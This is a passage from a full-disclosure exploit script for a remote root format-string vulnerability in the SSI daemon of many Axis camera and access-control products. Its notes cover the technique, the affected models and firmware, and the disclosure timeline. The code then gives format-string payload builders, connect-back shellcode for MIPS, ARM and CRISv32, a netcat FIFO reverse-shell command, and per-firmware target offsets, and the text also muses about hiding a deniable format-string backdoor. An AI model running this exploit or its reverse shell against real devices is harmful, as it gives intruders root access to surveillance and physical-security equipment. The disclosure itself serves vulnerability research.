\n# HTTP/1.1 500 Server Error \n# Content-Type: text/html; charset=ISO-8859-1 \n# \n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD> \n# <BODY><H1>500 Server Error</H1> \n# The server encountered an internal error and could not complete your request. 
\n# </BODY></HTML> \n# --- \n# \n# Which gave this output in /var/log/messages on the remote device: \n# \n# --- \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. \n# --- \n# \n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products \n# \n# --- \n# $ netcat -vvlp 31337 \n# listening on [any] 31337 ... \n# 192.168.0.90: inverse host lookup failed: Unknown host \n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 \n# id \n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) \n# pwd \n# /usr/html \n# --- \n# \n# Some technical notes: \n# \n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect. \n# Old metod with POP's coming into force instantly \n# \n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) \n# - Would be interesting to investigate why. \n# \n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 \n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff \n# \n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff \n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f \n# \n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: \n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) \n# \n# 4. Everything is randomized, except heap. \n# \n# 5. My initial attempts to use ROP's was not good, as I didn't want to create \n# one unique FMS key by testing each single firmware version, and using ROP with FMS \n# on heap seems pretty complicated as there is one jump availible, maximum two. \n# \n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. \n# \n# 6. 
Encoded and Decoded shellcode located in .bss section. \n# 6.1 FMS excecuted on heap \n# \n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM \n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, \n# so execute shellcode on heap/stack may be impossible. \n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, \n# and re-compile of the image. \n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. \n# \n# 8. This exploit are pretty well documented, more details can be extracted by reading \n# the code and comments. \n# \n# MIPS ssid maps \n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid \n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid \n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] \n# \n# ARM ssid maps \n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid \n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid \n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] \n# \n# Crisv32 ssid maps \n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid \n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid \n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] \n# \n# General notes: \n# \n# When the vul daemon process is exploited, and after popping root connect-back shell, \n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, \n# when the main process are fully alive again, I can enjoy the shell, and everybody else can \n# enjoy of the camera - that should make all of us happy ;) \n# During exploiting, logs says almost nothing, only that the main process restarted. 
\n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) \n# \n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), \n# after ssid cannot verify the user, free() are the closest function to be called after \n# vsyslog(), needed and perfect to use for jumping. \n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. \n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. \n# \n# Quite surprised to see so many different devices and under one major release version, \n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version. \n# \n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \n# \n# - No hardcoded login/password that could easily be found in firmware/software files. \n# - Extremely hard to find without local access (and find out what to trigger for opening the door) \n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\" \n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) \n# \n# Note: \n# I don't say that Axis Communication has made this hidden format string by this purpose. \n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). 
\n# \n# Vulnerable and exploitable products \n# \n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, \n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, \n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, \n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, \n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, \n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, \n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, \n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, \n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, \n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, \n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, \n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, \n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, \n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, \n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, \n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... 
and more \n# \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# \n# Firmware versions vulnerable to the SSI FMS exploit \n# \n# ('V.Vx' == The FMS key used in this exploit) \n# \n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) \n# 5.00.x 2008 - - no \n# 5.01.x 2008 no - no \n# 5.02.x 2008 no - - \n# 5.05.x 2009 no - - \n# 5.06.x 2009 no - - \n# 5.07.x 2009 no - no \n# 5.08.x 2010 no - - \n# 5.09.x 2010 no - - \n# 5.10.x 2009 no - - \n# 5.11.x 2010 no - - \n# 5.12.x 2010 no - - \n# 5.15.x 2010 no - - \n# 5.16.x 2010 no - - \n# 5.20.x 2010-2011 5.2x - 5.2x \n# 5.21.x 2011 5.2x - 5.2x \n# 5.22.x 2011 5.2x - - \n# 5.25.x 2011 5.2x - - \n# 5.40.x 2011 5.4x 5.4x 5.4x \n# 5.41.x 2012 5.4x - - \n# 5.50.x 2013 5.5x 5.5x 5.4x \n# 5.51.x 2013 - 5.4x - \n# 5.55.x 2013 - 5.5x 5.5x \n# 5.60.x 2014 - 5.6x 5.6x \n# 5.65.x 2014-2015 - 5.6x - \n# 5.70.x 2015 - 5.7x - \n# 5.75.x 2015 - 5.7x 5.7x \n# 5.80.x 2015 - 5.8x 5.8x \n# 5.81.x 2015 - 5.8x - \n# 5.85.x 2015 - 5.8x 5.8x \n# 5.90.x 2015 - 5.9x - \n# 5.95.x 2016 - 5.9x 5.8x \n# 6.10.x 2016 - 6.1x - \n# 6.15.x 2016 - - 6.1x \n# 6.20.x 2016 - 6.2x - \n# \n# Vendor URL's of still supported and affected products \n# \n# http://www.axis.com/global/en/products/access-control \n# http://www.axis.com/global/en/products/video-encoders \n# http://www.axis.com/global/en/products/network-cameras \n# http://www.axis.com/global/en/products/audio \n# \n# Axis Product Security \n# \n# product-security@axis.com \n# http://www.axis.com/global/en/support/product-security \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# http://www.axis.com/global/en/support/faq/FAQ116268 \n# \n# Timetable \n# \n# - Research and Development: 06/01/2016 - 01/06/2016 \n# - Sent vulnerability details to vendor: 05/06/2016 \n# - Vendor responce received: 06/06/2016 \n# - Vendor ACK of findings received: 07/06/2016 \n# - Vendor sent verification image: 13/06/2016 \n# - Confirmed that exploit do not 
work after vendors correction: 13/06/2016 \n# - Vendor informed about their service release(s): 29/06/2016 \n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 \n# - Full Disclosure: 18/07/2016 \n# \n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\" \n# \n# Have a nice day \n# /bashis \n# \n##################################################################################### \n \nimport sys \nimport string \nimport socket \nimport time \nimport argparse \nimport urllib, urllib2, httplib \nimport base64 \nimport ssl \nimport re \n \n \nclass do_FMS: \n \n# POP = \"%8x\" # Old style POP's with 8 bytes per POP \nPOP = \"%1c\" # Old style POP's with 1 byte per POP \nWRITElln = \"%lln\" # Write 8 bytes \nWRITEn = \"%n\" # Write 4 bytes \nWRITEhn = \"%hn\" # Write 2 bytes \nWRITEhhn = \"%hhn\" # Write 1 byte \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \nself.fmscode = \"\" \n \n# Mostly used internally in this function \ndef Add(self, data): \nself.fmscode += data \n \n# 'New Style' Double word (8 bytes) \ndef AddDirectParameterLLN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$lln') \n \n# 'New Style' Word (4 bytes) \ndef AddDirectParameterN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$n') \n \n# 'New Style' Half word (2 bytes) \ndef AddDirectParameterHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hn') \n \n# 'New Style' One Byte (1 byte) \ndef AddDirectParameterHHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hhn') \n \n# Addressing \ndef AddADDR(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('u') \n \n# 'Old Style' POP \ndef AddPOP(self, size): \nif size != 0: \nself.Add(self.POP * size) \n \n# Normally only one will be sent, multiple is good to quick-check for any FMS \n# \n# 'Old Style' Double word (8 bytes) \ndef AddWRITElln(self, size): \nself.Add(self.WRITElln * size) \n \n# 'Old 
Style' Word (4 bytes) \ndef AddWRITEn(self, size): \nself.Add(self.WRITEn * size) \n \n# 'Old Style' Half word (2 bytes) \ndef AddWRITEhn(self, size): \nself.Add(self.WRITEhn * size) \n \n# 'Old Style' One byte (1 byte) \ndef AddWRITEhhn(self, size): \nself.Add(self.WRITEhhn * size) \n \n# Return the whole FMS string \ndef FMSbuild(self): \nreturn self.fmscode \n \nclass HTTPconnect: \n \ndef __init__(self, host, proto, verbose, creds, noexploit): \nself.host = host \nself.proto = proto \nself.verbose = verbose \nself.credentials = creds \nself.noexploit = noexploit \n \n# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc.. \ndef RAW(self, uri): \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \ntmp = self.host.split(':') \nHOST = tmp[0] \nPORT = int(tmp[1]) \nif self.verbose: \nprint \"[Verbose] Sending to:\", HOST \nprint \"[Verbose] Port:\", PORT \nprint \"[Verbose] URI:\",uri \ns.connect((HOST, PORT)) \ns.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri) \nhtml = (s.recv(4096)) # We really do not care whats coming back \n# if html: \n# print \"[i] Received:\",html \ns.shutdown(3) \ns.close() \nreturn html \n \n \ndef Send(self, uri): \n \n# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually \n# matter for the functionality of this exploit, only for future references. 
\nheaders = { \n'User-Agent' : 'MSIE', \n} \n \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \nurl = '%s://%s%s' % (self.proto, self.host, uri) \n \nif self.verbose: \nprint \"[Verbose] Sending:\", url \n \nif self.proto == 'https': \nif hasattr(ssl, '_create_unverified_context'): \nprint \"[i] Creating SSL Default Context\" \nssl._create_default_https_context = ssl._create_unverified_context \n \nif self.credentials: \nBasic_Auth = self.credentials.split(':') \nif self.verbose: \nprint \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1] \ntry: \npwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() \npwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) \nauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) \nopener = urllib2.build_opener(auth_handler) \nurllib2.install_opener(opener) \nexcept Exception as e: \nprint \"[!] Basic Auth Error:\",e \nsys.exit(1) \n \nif self.noexploit and not self.verbose: \nprint \"[<] 204 Not Sending!\" \nhtml = \"Not sending any data\" \nelse: \ndata = None \nreq = urllib2.Request(url, data, headers) \nrsp = urllib2.urlopen(req) \nif rsp: \nprint \"[<] %s OK\" % rsp.code \nhtml = rsp.read() \nreturn html \n \n \nclass shellcode_db: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef sc(self,target): \nself.target = target \n \n \n# Connect back shellcode \n# \n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\" \n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators \n# MIPSel: Written by Jacob Holcomb (url encoded by me) \n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php \n# \n# Slightly modified syscall's \nMIPSel = string.join([ \n#close stdin \n\"%ff%ff%04%28\" #slti a0,zero,-1 \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stdout \n\"%11%11%04%28\" #slti a0,zero,4369 \n\"%a6%0f%02%24\" #li v0,4006 
\n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stderr \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# socket AF_INET (2) \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%27%28%80%01\" #nor a1,t4,zero \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%57%10%02%24\" #li v0,4183 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF \n# \n# dup2 stdout \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# dup2 stderr \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# Port \n\"PP1PP0%05%3c\" \n\"%01%ff%a5%34\" \n# \n\"%01%01%a5%20\" #addi a1,a1,257 \n\"%f8%ff%a5%af\" #sw a1,-8(sp) \n# \n# IP \n\"IP3IP4%05%3c\" \n\"IP1IP2%a5%34\" \n# \n\"%fc%ff%a5%af\" #sw a1,-4(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ef%ff%0c%24\" #li t4,-17 \n\"%27%30%80%01\" #nor a2,t4,zero \n\"%4a%10%02%24\" #li v0,4170 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%62%69%08%3c\" #lui t0,0x6962 \n\"%2f%2f%08%35\" #ori t0,t0,0x2f2f \n\"%ec%ff%a8%af\" #sw t0,-20(sp) \n\"%73%68%08%3c\" #lui t0,0x6873 \n\"%6e%2f%08%35\" #ori t0,t0,0x2f6e \n\"%f0%ff%a8%af\" #sw t0,-16(sp \n\"%ff%ff%07%28\" #slti a3,zero,-1 \n\"%f4%ff%a7%af\" #sw a3,-12(sp) \n\"%fc%ff%a7%af\" #sw a3,-4(sp \n\"%ec%ff%a4%23\" #addi a0,sp,-20 \n\"%ec%ff%a8%23\" #addi t0,sp,-20 \n\"%f8%ff%a8%af\" #sw t0,-8(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ec%ff%bd%27\" #addiu sp,sp,-20 \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%ab%0f%02%24\" #li v0,4011 (execve) \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n], '') \n \n# Working netcat shell \n# - $PATH will locate 'mkfifo', 'nc' and 'rm' \n# - LHOST / LPORT will be changed on the fly later in the code \n# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting \n# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator] \n# $ echo 
-n \"$IFS\" | hexdump -C \n# 00000000 20 09 0a \n# - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c] \n# \n# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator \n# \n# Working with Apache and Boa \n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\" \nNCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\" \n \nARMel = string.join([ \n# original: http://shell-storm.org/shellcode/files/shellcode-754.php \n# 32-bit instructions, enter thumb mode \n\"%01%10%8f%e2\" # add r1, pc, #1 \n\"%11%ff%2f%e1\" # bx r1 \n \n# 16-bit thumb instructions follow \n# \n# socket(2, 1, 0) \n\"%02%20\" #mov r0, #2 \n\"%01%21\" #mov r1, #1 \n\"%92%1a\" #sub r2, r2, r2 \n\"%0f%02\" #lsl r7, r1, #8 \n\"%19%37\" #add r7, r7, #25 \n\"%01%df\" #svc 1 \n# \n# connect(r0, &addr, 16) \n\"%06%1c\" #mov r6, r0 \n\"%08%a1\" #add r1, pc, #32 \n\"%10%22\" #mov r2, #16 \n\"%02%37\" #add r7, #2 \n\"%01%df\" #svc 1 \n# \n# dup2(r0, 0/1/2) \n\"%3f%27\" #mov r7, #63 \n\"%02%21\" #mov r1, #2 \n# \n#lb: \n\"%30%1c\" #mov r0, r6 \n\"%01%df\" #svc 1 \n\"%01%39\" #sub r1, #1 \n\"%fb%d5\" #bpl lb \n# \n# execve(\"/bin/sh\", [\"/bin/sh\", 0], 0) \n\"%05%a0\" #add r0, pc, #20 \n\"%92%1a\" #sub r2, r2, r2 \n\"%05%b4\" #push {r0, r2} \n\"%69%46\" #mov r1, sp \n\"%0b%27\" #mov r7, #11 \n\"%01%df\" #svc 1 \n# \n\"%c0%46\" # .align 2 (NOP) \n\"%02%00\" # .short 0x2 (struct sockaddr) \n\"PP1PP0\" # .short 0x3412 (port: 0x1234) \n\"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1) \n# .ascii \"/bin/sh\\0\\0\" \n\"%2f%62%69%6e\" # /bin \n\"%2f%73%68%00%00\" # /sh\\x00\\x00 \n\"%00%00%00%00\" \n\"%c0%46\" \n], '') \n \n \n# Connect-back shell for Axis CRISv32 \n# Written by mcw noemail eu 2016 \n# \nCRISv32 = string.join([ \n#close(0) \n\"%7a%86\" # clear.d r10 \n\"%5f%9c%06%00\" # 
movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(1) \n\"%41%a2\" # moveq 1,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(2) \n\"%42%a2\" # moveq 2,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n# \n\"%10%e1\" # addoq 16,sp,acr \n\"%42%92\" # moveq 2,r9 \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%02%f2\" # addq 2,acr \n#PORT \n\"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 # \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%6f%96\" # move.d acr,r9 \n\"%04%92\" # addq 4,r9 \n#IP \n\"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr \n\"%e9%fb\" # move.d acr,[r9] \n# \n#socket() \n\"%42%a2\" # moveq 2,r10 \n\"%41%b2\" # moveq 1,r11 \n\"%7c%86\" # clear.d r12 \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%41%a2\" # moveq 1,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# \n\"%6a%96\" # move.d $r10,$r9 \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%ef%9b\" # move.d $r9,[$acr] \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%10%92\" # addq 16,$r9 \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%69%b6\" # move.d $r9,$r11 \n\"%50%c2\" # moveq 16,$r12 \n# \n# connect() \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%43%a2\" # moveq 3,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# dup(0) already in socket \n#dup(1) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%41%b2\" # moveq 1,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#dup(2) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%42%b2\" # moveq 2,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#execve(\"/bin/sh\",NULL,NULL) \n\"%90%e2\" # subq 16,$sp \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%a6\" # move.d $sp,$10 \n\"%6f%0e%2f%2f%62%69\" # move.d 
69622f2f,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%e9%ab\" # move.d $r10,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%10%e2\" # addq 16,$sp \n\"%6e%f6\" # move.d $sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%7c%86\" # clear.d $r12 \n\"%4b%92\" # moveq 11,$r9 \n\"%3d%e9\" # break 13 \n], '') \n \n \nif self.target == 'MIPSel': \nreturn MIPSel \nelif self.target == 'ARMel': \nreturn ARMel \nelif self.target == 'CRISv32': \nreturn CRISv32 \nelif self.target == 'NCSH1': \nreturn NCSH \nelif self.target == 'NCSH2': \nreturn NCSH \nelse: \nprint \"[!] Unknown shellcode! (%s)\" % str(self.target) \nsys.exit(1) \n \n \nclass FMSdb: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef FMSkey(self,target): \nself.target = target \n \ntarget_db = { \n \n#----------------------------------------------------------------------- \n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) \n#----------------------------------------------------------------------- \n \n# \n# Using POP format string, AKA 'Old Style' \n# \n# MPQT \n'MIPS-5.85.x': [ \n0x41f370, # Adjust to GOT free() address \n0x420900, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.40.3': [ \n0x41e41c, # Adjust to GOT free() address \n0x4208cc, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.4x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x42097c, # .bss shellcode address \n7, # 1st POP's 
\n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.5x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.55x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n11, # 1st POP's \n9, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.6x': [ \n0x41d048, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n \n], \n \n# MPQT \n'MIPS-5.7x': [ \n0x41d04c, # Adjust to GOT free() address \n0x41f718, # .bss shellcode address \n2, # 1st POP's \n14, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.75x': [ \n0x41c498, # Adjust to GOT free() address \n0x41daf0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.8x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e740, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.9x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e750, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.1x': [ \n0x41c480, # Adjust to GOT free() address 
\n0x41dac0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.2x': [ \n0x41e578, # Adjust to GOT free() address \n0x41fae0, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.20x': [ \n0x41d0c4, # Adjust to GOT free() address \n0x41e700, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.3x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x420a78, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.1x': [ \n0x41e268, # Adjust to GOT free() address \n0x420818, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# 